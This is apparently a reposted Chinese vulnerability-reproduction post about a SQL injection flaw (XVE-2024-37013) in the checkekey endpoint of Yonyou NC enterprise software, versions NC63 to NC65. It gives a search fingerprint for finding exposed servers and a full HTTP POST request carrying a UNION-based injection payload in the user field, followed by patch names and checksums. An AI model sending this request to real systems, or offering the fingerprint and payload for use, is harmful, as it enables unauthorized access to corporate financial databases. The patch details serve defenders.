用友NC(也称用友NC6或NCC)是用友网络科技股份有限公司开发的一款企业级管理软件,旨在为企业提供全方位的管理服务。主要面向大型企业和集团公司,提供全面的财务和业务管理解决方案,助力企业实现数字化转型和高效管理。采用J2EE架构和先进开放的集团级开发平台UAP,融合了云计算技术、移动应用技术等最新互联网技术,形成了集团管控8大领域15大行业68个细分行业的解决方案。凭借其全面的功能、强大的集成能力和高度的可定制化,成为许多大型企业和集团公司进行财务和业务管理的首选工具。
影响范围:
NC63、NC633、NC65
app="用友-UFIDA-NC"
POST/portal/pt/office/checkekey?pageId=login HTTP/1.1Host:User-Agent: Mozilla/5.0 (WindowsNT10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeuser=1' UNIONALLSELECTNULL,CHR(113)||CHR(113)||CHR(112)||CHR(122)||CHR(113)||CHR(80)||CHR(103)||CHR(106)||CHR(122)||CHR(81)||CHR(70)||CHR(74)||CHR(104)||CHR(106)||CHR(107)||CHR(100)||CHR(74)||CHR(105)||CHR(114)||CHR(88)||CHR(73)||CHR(112)||CHR(81)||CHR(101)||CHR(119)||CHR(116)||CHR(79)||CHR(71)||CHR(78)||CHR(115)||CHR(65)||CHR(111)||CHR(70)||CHR(103)||CHR(85)||CHR(71)||CHR(83)||CHR(101)||CHR(65)||CHR(71)||CHR(90)||CHR(114)||CHR(87)||CHR(78)||CHR(107)||CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULLFROMDUAL-- twnX&ekey=1
NC63方案
补丁名称:patch_portal63_checkekey的sql注入安全漏洞
补丁编码:NCM_NC6.3_000_109902_20240927_GP_429685438
校验码:
706843a076cb25f11b2b5a0e3b202a682f243a6a2d2241e04d252afab4f53086
NC633方案
补丁名称:patch_portal633_checkekey的sql注入安全漏洞
补丁编码:NCM_NC6.33_000_109902_20240927_GP_429710563
校验码:
fad93fdb5538048d2479806f5d0138e42497fa1bc028337357c273d6117935a0
NC65方案
补丁名称:patch_portal65_checkekey的sql注入安全漏洞
补丁编码:NCM_NC6.5_000_109902_20240927_GP_429733520
校验码:
02c8b1afcda201392981f64be3de8f079e70d686353db789ec756a389c61866d
原文始发于微信公众号(冷漠安全):「漏洞复现」用友NC checkekey SQL 注入漏洞(XVE-2024-37013)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论